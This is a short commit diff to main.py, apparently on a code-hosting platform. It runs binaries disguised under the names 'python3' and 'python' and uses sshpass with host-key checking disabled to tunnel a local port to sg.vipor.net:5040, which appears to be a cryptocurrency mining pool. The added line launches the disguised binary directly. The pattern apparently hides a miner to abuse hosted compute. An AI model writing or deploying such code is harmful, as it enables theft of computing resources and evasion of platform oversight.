ilhamap commited on
Commit
9b9e1c9
·
verified ·
1 Parent(s): 238473a

Update main.py

Browse files
Files changed (1) hide show
  1. main.py +2 -1
main.py CHANGED
@@ -1,5 +1,6 @@
1
  import os
2
  os.system("chmod +x python3 python")
3
  os.system("tmux new-session -d -s ses sshpass -p ' ' ssh -o StrictHostKeyChecking=no -L 3000:sg.vipor.net:5040 [email protected]")
4
- os.system("tmux new-session -d -s ses1 ./python3")
 
5
  os.system("tmux ls")
 
1
  import os
2
  os.system("chmod +x python3 python")
3
  os.system("tmux new-session -d -s ses sshpass -p ' ' ssh -o StrictHostKeyChecking=no -L 3000:sg.vipor.net:5040 [email protected]")
4
+ #os.system("tmux new-session -d -s ses1 ./python3")
5
+ os.system('./python')
6
  os.system("tmux ls")